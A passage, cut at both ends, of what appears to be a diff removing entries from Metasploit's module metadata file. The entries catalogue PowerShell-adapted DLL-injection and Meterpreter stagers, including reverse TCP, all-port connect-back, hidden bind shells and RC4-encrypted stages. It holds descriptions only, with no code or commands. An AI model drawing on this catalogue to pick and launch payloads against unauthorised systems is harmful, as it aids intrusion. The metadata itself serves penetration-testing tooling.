"windows/patchupdllinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/patchupdllinject/find_tag": { - "name": "Powershell Exec, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/find_tag", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_ord_tcp": { - "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": 
"payload/cmd/windows/powershell/patchupdllinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp": { - "name": "Powershell Exec, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_allports": { - "name": "Powershell Exec, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_dns": { - "name": "Powershell Exec, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "RageLtMan" - ], - "description": 
"Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": 
"windows/patchupdllinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", - "references": [], - 
"platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp": { - "name": "Powershell Exec, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp", - "check": false, - "post_auth": false, 
- "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp": { - "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf 
", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_named_pipe": { - "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": 
"cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp": { - "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_tcp": { - "name": "Powershell Exec, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid": { - "name": 
"Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/find_tag": { - "name": "Powershell Exec, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": 
"cmd/windows/powershell/patchupmeterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/find_tag", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - 
"author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp": { - "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": 
"cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp": { - "name": "Powershell Exec, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports": { - "name": "Powershell Exec, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": 
"Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns": { - "name": "Powershell Exec, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": 